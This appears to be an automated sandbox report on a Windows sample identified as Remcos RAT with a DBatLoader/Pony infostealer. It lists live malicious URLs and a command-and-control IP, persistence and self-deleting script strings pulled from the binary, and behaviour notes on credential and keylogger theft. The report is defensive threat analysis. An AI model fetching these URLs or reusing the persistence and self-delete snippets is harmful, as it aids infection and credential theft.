Source: file.exe, 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp | String found in binary or memory: Remcos_Mutex_Inj
Source: file.exe, 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp | String found in binary or memory: \uninstall.vbsEXEpathUserinitC:\WINDOWS\system32\userinit.exeShellexplorer.exeSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsUserProfileAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS
Source: file.exe, 0000000B.00000002.2305053551.00000000006D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Remcos_Mutex_InjDOM^
Source: Yara match | File source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTR
Source: Yara match | File source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4505601069.00000000022FF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4505309464.00000000004F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 432, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: file.exe PID: 6000, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: cmd.exe 11_2_00402AAD
MITRE ATT&CK Matrix (the matrix table was flattened during extraction; cell layout is not recoverable)
Tactic columns: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Techniques shown with a signature count in the matrix: Scripting; Valid Accounts; Native API; DLL Side-Loading; Deobfuscate/Decode Files or Information; OS Credential Dumping; System Time Discovery; Archive Collected Data; Ingress Tool Transfer; System Shutdown/Reboot; Command and Scripting Interpreter; Obfuscated Files or Information; Input Capture; Account Discovery; Data from Local System; Encrypted Channel; Defacement; Service Execution; Access Token Manipulation; Install Root Certificate; Credentials in Registry; System Service Discovery; Screen Capture; Non-Standard Port; Windows Service; Credentials In Files; File and Directory Discovery; Email Collection; Remote Access Software; Registry Run Keys / Startup Folder; Process Injection; Masquerading; System Information Discovery; Non-Application Layer Protocol; Security Software Discovery; Clipboard Data; Application Layer Protocol; Virtualization/Sandbox Evasion; Process Discovery; Application Window Discovery; System Owner/User Discovery
Behavior Graph (rendered as text; the graph image itself is not part of this extraction)
Behavior Graph ID: 1574872 | Sample: file.exe | Startdate: 13/12/2024 | Architecture: WINDOWS | Score: 100

Start (node 2)
  DNS: www.mva.by, admino.ml, mva.by
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 24 other signatures
  Started: file.exe (node 10); file.exe (node 15)

file.exe (node 10)
  Network: mva.by 93.125.99.121, ports 49704, 80, BELPAK-ASBELPAKBY Belarus
  Dropped: C:\Users\user\AppData\Roaming\...\file.exe (PE32); C:\Users\user\AppData\Local\Temp\SGS.exe (PE32); C:\Users\user\AppData\Local\...\scan[1].exe (PE32); C:\Users\user\...\file.exe:Zone.Identifier (ASCII)
  Signatures: Drops PE files to the startup folder; Injects a PE file into a foreign processes
  Started: SGS.exe (node 17); file.exe (node 20)

file.exe (node 15)
  Started: SGS.exe (node 24); file.exe (node 26)

SGS.exe (node 17)
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code; 2 other signatures
  Started: SGS.exe (node 28)

file.exe (node 20)
  Network: 154.16.63.197, ports 3360, 49705, 49751, ASDETUKhttpwwwheficedcomGB South Africa
  Dropped: C:\Users\user\AppData\Roaming\...\logs.dat (ASCII)
  Signatures: Opens the same file many times (likely Sandbox evasion)
  Started: conhost.exe (node 31)

SGS.exe (node 24)
  Signatures: Injects a PE file into a foreign processes
  Started: SGS.exe (node 33)

file.exe (node 26)
  Signatures: Detected Remcos RAT; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

SGS.exe (node 28)
  Started: cmd.exe (node 35)

SGS.exe (node 33)
  Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
  Started: cmd.exe (node 37)

cmd.exe (node 35)
  Started: conhost.exe (node 39)

cmd.exe (node 37)
  Started: conhost.exe (node 41)

Source | Detection | Scanner | Label
file.exe | 74% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Avira | HEUR/AGEN.1331271
file.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\SGS.exe | 100% | Avira | HEUR/AGEN.1331271
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe | 100% | Avira | HEUR/AGEN.1331271
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | 100% | Avira | HEUR/AGEN.1331271
C:\Users\user\AppData\Local\Temp\SGS.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe | 79% | ReversingLabs | Win32.Infostealer.Fareit
C:\Users\user\AppData\Local\Temp\SGS.exe | 79% | ReversingLabs | Win32.Infostealer.Fareit
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | 74% | ReversingLabs | Win32.Infostealer.Pony
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label
http://www.mva.by/G | 0% | Avira URL Cloud | safe
ftp://http://https://ftp.fireFTPsites.datSeaMonkey | 0% | Avira URL Cloud | safe
http://https://ftp://operawand.dat_Software | 0% | Avira URL Cloud | safe
http://www.mva.by/= | 0% | Avira URL Cloud | safe
http://www.mva.by/tags/scan.exeA%#%#%$#%A1#%#%$#%A1 | 0% | Avira URL Cloud | safe
http://www.mva.by/tags/scan.exeh | 0% | Avira URL Cloud | safe
http://www.mva.by/tags/scan.exeA%#%#%$#%A1ca | 0% | Avira URL Cloud | safe
http://www.mva.by/tags/scan.exeA%#%#%$#%A1 | 0% | Avira URL Cloud | safe
http://admino.ml/eme/kachistub.exe | 0% | Avira URL Cloud | safe
http://admino.ml/eme/gate.phphttp://admino.ml/eme/kachistub.exeYUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1 | 0% | Avira URL Cloud | safe
http://www.mva.by/tags/scan.exe | 0% | Avira URL Cloud | safe
http://www.mva.by/T | 0% | Avira URL Cloud | safe
http://www.mva.by/ | 0% | Avira URL Cloud | safe
http://admino.ml/eme/gate.php | 0% | Avira URL Cloud | safe
http://www.mva.by/tags/scan.execrC: | 0% | Avira URL Cloud | safe
http://www.mva.by/tags/scan.exeystem32 | 0% | Avira URL Cloud | safe
http://www.mva.by/tags/scan.exeRRC: | 0% | Avira URL Cloud | safe
http://www.mva.by/tags/scan.exeLMEM | 0% | Avira URL Cloud | safe
http://www.mva.by/tags/scan.exe_A | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mva.by | 93.125.99.121 | true | false | | unknown
admino.ml | unknown | unknown | true | | unknown
www.mva.by | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://admino.ml/eme/kachistub.exe | true | Avira URL Cloud: safe | unknown
http://www.mva.by/tags/scan.exe | false | Avira URL Cloud: safe | unknown
http://admino.ml/eme/gate.php | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://https://ftp://operawand.dat_Software | SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.mva.by/= | file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp | false | | high
ftp://http://https://ftp.fireFTPsites.datSeaMonkey | SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mva.by/G | file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mva.by/tags/scan.exeA%#%#%$#%A1#%#%$#%A1 | file.exe, 00000000.00000003.2085543443.0000000002960000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mva.by/tags/scan.exeA%#%#%$#%A1 | file.exe, 00000000.00000003.2085543443.0000000002960000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ibsensoftware.com/ | SGS.exe, 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp | false | | high
http://www.mva.by/tags/scan.exeA%#%#%$#%A1ca | file.exe, 00000000.00000003.2085543443.0000000002960000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://admino.ml/eme/gate.phphttp://admino.ml/eme/kachistub.exeYUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1 | SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, SGS.exe, 0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.mva.by/tags/scan.exeh | file.exe, 00000000.00000002.2142430073.00000000006E5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.mva.by/T | file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.mva.by/tags/scan.execrC: | file.exe, 00000000.00000003.2126925157.0000000000737000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mva.by/tags/scan.exeystem32 | file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mva.by/tags/scan.exeRRC: | file.exe, 00000009.00000002.2306159539.000000000090E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000009.00000003.2304232651.00000000008FE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mva.by/tags/scan.exeLMEM | file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.mva.by/tags/scan.exe_A | file.exe, 00000009.00000002.2305977455.000000000086E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mva.by/ | file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
154.16.63.197 | unknown | South Africa | 61317 | ASDETUKhttpwwwheficedcomGB | true
93.125.99.121 | mva.by | Belarus | 6697 | BELPAK-ASBELPAKBY | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1574872
Start date and time: 2024-12-13 17:56:36 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 35s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.rans.troj.adwa.spyw.evad.winEXE@23/8@3/2
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 90
• Number of non-executed functions: 232
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target SGS.exe, PID 5968 because there are no executed functions
• Execution Graph export aborted for target SGS.exe, PID 7148 because there are no executed functions
• Execution Graph export aborted for target file.exe, PID 1076 because there are no executed functions
• Execution Graph export aborted for target file.exe, PID 4084 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: file.exe
                                               Time | Type | Description
                                               11:57:27 | API Interceptor | 5017953x Sleep call for process: file.exe modified
                                               11:57:35 | API Interceptor | 2x Sleep call for process: SGS.exe modified
                                               17:57:37 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe
                                              No context
                                              No context
                                               Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                               BELPAK-ASBELPAKBY | jade.sh4.elf | Get hash | malicious | Mirai | Browse | 37.212.246.192
                                               BELPAK-ASBELPAKBY | la.bot.arm6.elf | Get hash | malicious | Mirai | Browse | 86.57.233.10
                                               BELPAK-ASBELPAKBY | Owari.mpsl.elf | Get hash | malicious | Unknown | Browse | 93.84.101.32
                                               BELPAK-ASBELPAKBY | jew.arm6.elf | Get hash | malicious | Unknown | Browse | 178.121.230.53
                                               BELPAK-ASBELPAKBY | meerkat.arm.elf | Get hash | malicious | Mirai | Browse | 178.120.18.254
                                               BELPAK-ASBELPAKBY | main_ppc.elf | Get hash | malicious | Mirai | Browse | 37.213.184.109
                                               BELPAK-ASBELPAKBY | teste.arm.elf | Get hash | malicious | Gafgyt, Mirai, Moobot, Okiru | Browse | 93.84.125.13
                                               BELPAK-ASBELPAKBY | 72STaC6BmljfbIQ.exe | Get hash | malicious | FormBook | Browse | 178.172.160.30
                                               BELPAK-ASBELPAKBY | sora.mpsl.elf | Get hash | malicious | Mirai | Browse | 93.85.251.230
                                               BELPAK-ASBELPAKBY | mips.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 178.123.247.50
                                               ASDETUKhttpwwwheficedcomGB | elitebotnet.arm5.elf | Get hash | malicious | Mirai, Okiru | Browse | 134.202.154.125
                                               ASDETUKhttpwwwheficedcomGB | hax.mpsl.elf | Get hash | malicious | Mirai | Browse | 191.108.164.183
                                               ASDETUKhttpwwwheficedcomGB | 6fW0GedR6j.xls | Get hash | malicious | Unknown | Browse | 181.214.58.112
                                               ASDETUKhttpwwwheficedcomGB | meerkat.arm.elf | Get hash | malicious | Mirai | Browse | 191.107.60.113
                                               ASDETUKhttpwwwheficedcomGB | home.ppc.elf | Get hash | malicious | Mirai | Browse | 89.207.176.202
                                               ASDETUKhttpwwwheficedcomGB | .akcqrfutuo.elf | Get hash | malicious | Unknown | Browse | 193.176.187.115
                                               ASDETUKhttpwwwheficedcomGB | MjU4dYOfgf.exe | Get hash | malicious | AgentTesla | Browse | 191.101.50.240
                                               ASDETUKhttpwwwheficedcomGB | Demon.i586.elf | Get hash | malicious | Mirai, Gafgyt | Browse | 85.209.17.110
                                               ASDETUKhttpwwwheficedcomGB | Demon.sh4.elf | Get hash | malicious | Mirai, Gafgyt | Browse | 85.209.17.110
                                               ASDETUKhttpwwwheficedcomGB | Demon.mips.elf | Get hash | malicious | Mirai, Gafgyt | Browse | 85.209.17.110
                                              No context
                                              No context
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):853504
                                              Entropy (8bit):6.648979455916544
                                              Encrypted:false
                                              SSDEEP:12288:jWBoBYd39letTbwm3Undsb+gfrEJ6txTtGbth0VCr/VRaDtdzDXT+0N2:jeR9ItXwdnWbLrEJO8mOERXTH2
                                              MD5:31B2F8C329A601B145E7E71A6D120A7B
                                              SHA1:58487332C00CB299D67F14C288CBDF9AA9099E44
                                              SHA-256:F06D03375B253842A56748E5E49206147AB986E73B109392A36BE672616C6B5D
                                              SHA-512:92021E862955CCEC4FF72770CDD1A89D165F26C500A907DD078C4D665423B56736FA0A81CF5D50AB8DA91807A18A762D2C307F3AA503187BABB598674DE3AC1C
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 79%
                                              Reputation:low
                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................V...........d.......p....@..........................p...................@...............................$...p...........................s..................................................................................CODE.....`.......V.................. ..`DATA..... ...p.......Z..............@...BSS..................n...................idata...0.......&...n..............@....tls.....................................rdata..............................@..P.reloc...........t..................@..P.rsrc........p......................@..P....................................@..P........................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\SGS.exe
                                              File Type:ASCII text, with CRLF, CR line terminators
                                              Category:dropped
                                              Size (bytes):94
                                              Entropy (8bit):3.233204299824007
                                              Encrypted:false
                                              SSDEEP:3:k4Zoa5/kFWJFFN6dAFZkMFlGl/AVFn:k/0/kFY/NDFZotwFn
                                              MD5:3880EEB1C736D853EB13B44898B718AB
                                              SHA1:4EEC9D50360CD815211E3C4E6BDD08271B6EC8E6
                                              SHA-256:936D9411D5226B7C5A150ECAF422987590A8870C8E095E1CAA072273041A86E7
                                              SHA-512:3EAA3DDDD7A11942E75ACD44208FBE3D3FF8F4006951CD970FB9AB748C160739409803450D28037E577443504707FC310C634E9DC54D0C25E8CFE6094F017C6B
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:......... :ktk ...... del . %1 ...if .. exist . %1 . goto .. ktk.. del . %0
                                              Process:C:\Users\user\AppData\Local\Temp\SGS.exe
                                              File Type:ASCII text, with CRLF, CR line terminators
                                              Category:dropped
                                              Size (bytes):94
                                              Entropy (8bit):3.233204299824007
                                              Encrypted:false
                                              SSDEEP:3:k4Zoa5/kFWJFFN6dAFZkMFlGl/AVFn:k/0/kFY/NDFZotwFn
                                              MD5:3880EEB1C736D853EB13B44898B718AB
                                              SHA1:4EEC9D50360CD815211E3C4E6BDD08271B6EC8E6
                                              SHA-256:936D9411D5226B7C5A150ECAF422987590A8870C8E095E1CAA072273041A86E7
                                              SHA-512:3EAA3DDDD7A11942E75ACD44208FBE3D3FF8F4006951CD970FB9AB748C160739409803450D28037E577443504707FC310C634E9DC54D0C25E8CFE6094F017C6B
                                              Malicious:false
                                              Preview:......... :ktk ...... del . %1 ...if .. exist . %1 . goto .. ktk.. del . %0
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):853504
                                              Entropy (8bit):6.648979455916544
                                              Encrypted:false
                                              SSDEEP:12288:jWBoBYd39letTbwm3Undsb+gfrEJ6txTtGbth0VCr/VRaDtdzDXT+0N2:jeR9ItXwdnWbLrEJO8mOERXTH2
                                              MD5:31B2F8C329A601B145E7E71A6D120A7B
                                              SHA1:58487332C00CB299D67F14C288CBDF9AA9099E44
                                              SHA-256:F06D03375B253842A56748E5E49206147AB986E73B109392A36BE672616C6B5D
                                              SHA-512:92021E862955CCEC4FF72770CDD1A89D165F26C500A907DD078C4D665423B56736FA0A81CF5D50AB8DA91807A18A762D2C307F3AA503187BABB598674DE3AC1C
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\user\AppData\Local\Temp\SGS.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 79%
                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................V...........d.......p....@..........................p...................@...............................$...p...........................s..................................................................................CODE.....`.......V.................. ..`DATA..... ...p.......Z..............@...BSS..................n...................idata...0.......&...n..............@....tls.....................................rdata..............................@..P.reloc...........t..................@..P.rsrc........p......................@..P....................................@..P........................................................................................................................................
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):917504
                                              Entropy (8bit):6.600373214988344
                                              Encrypted:false
                                              SSDEEP:12288:ZWBoBYd39letTbwm3Undsb+gfrEJLzDQ2bALSKLmDt8N90il5HyV/e4:ZeR9ItXwdnWbLrEJJrta5Hah
                                              MD5:21D13F2F3C4DB8F083B672D81831FA5E
                                              SHA1:B93F931A10A8A4B6F155B6B2AD9C5F9FBB3D71D0
                                              SHA-256:17BB66D25EC39D1818CC01E067EA7139EEF15DCB24BCE24840666EEDE661A3C3
                                              SHA-512:005658047AE5BD43D2C709C640FFD60B17A3E551657502804DBFD288193B340834E74B6A007731F401D4FC62B76CBAFDE40E5A30B08F9FB00F9506B6438C470D
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 74%
                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................V...........d.......p....@..........................p...................@...............................$...p...........................s..................................................................................CODE.....`.......V.................. ..`DATA..... ...p.......Z..............@...BSS..................n...................idata...0.......&...n..............@....tls.....................................rdata..............................@..P.reloc...........t..................@..P.rsrc........p......................@..P....................................@..P........................................................................................................................................
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):132
                                              Entropy (8bit):5.03831135575865
                                              Encrypted:false
                                              SSDEEP:3:Nt9RKOXyfVFhMLrA4RXMRPz1f5wOUWJRWD9Mly63Qx1oy1aeo:NBKOitg/Xqdz1fuONJAxM86gxNIP
                                              MD5:0B5326158663C614FCDD8CEBDCC2A1E6
                                              SHA1:D5F60933F5BDF6F0437730E79DA6E8F41C098CD7
                                              SHA-256:0C98C6794F48EAC6995FD414FC44D15E59B93044135C462EB446088E2F5420FF
                                              SHA-512:CE48EE36586D4EB3799FE7BBA3ED7A7094D9DE92F3B1AE98FE683D35145A6E2469D41F46800D528378212293113D4CB5AD14A870DAACCF79A6C69F98F257F4FD
                                              Malicious:true
                                              Preview:..{ 2024/12/13 11:57:37 - Offline Keylogger Started! }....[ C:\Users\user\Desktop\file.exe ]..[r..[ Run ]....[ Program Manager ]..
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):967
                                              Entropy (8bit):5.019521591495582
                                              Encrypted:false
                                              SSDEEP:24:qSDtTLOtoOErSPHah/RVDVryg6bCFDMRjhacmZ:PDhOKOq06BRpVryg6bGDMRjhacmZ
                                              MD5:52E928B852C1FF7CC62DA9E6951AD4AD
                                              SHA1:1A72CF75C6743E7D6F8F8FD215BA8994BAF984AA
                                              SHA-256:E94D27AA04D27E5FD7253AAB079513EEED2940326A8D221C505B0CF4CB5B641A
                                              SHA-512:EB4008199A4E76288D11F1A47F0886731A4953215892A2DCC18EA54056341CAE5F91EF30D1AFD0CE5136A14221B7EF6C31F0927887EC362B002F5C33F9DB3DE3
                                              Malicious:false
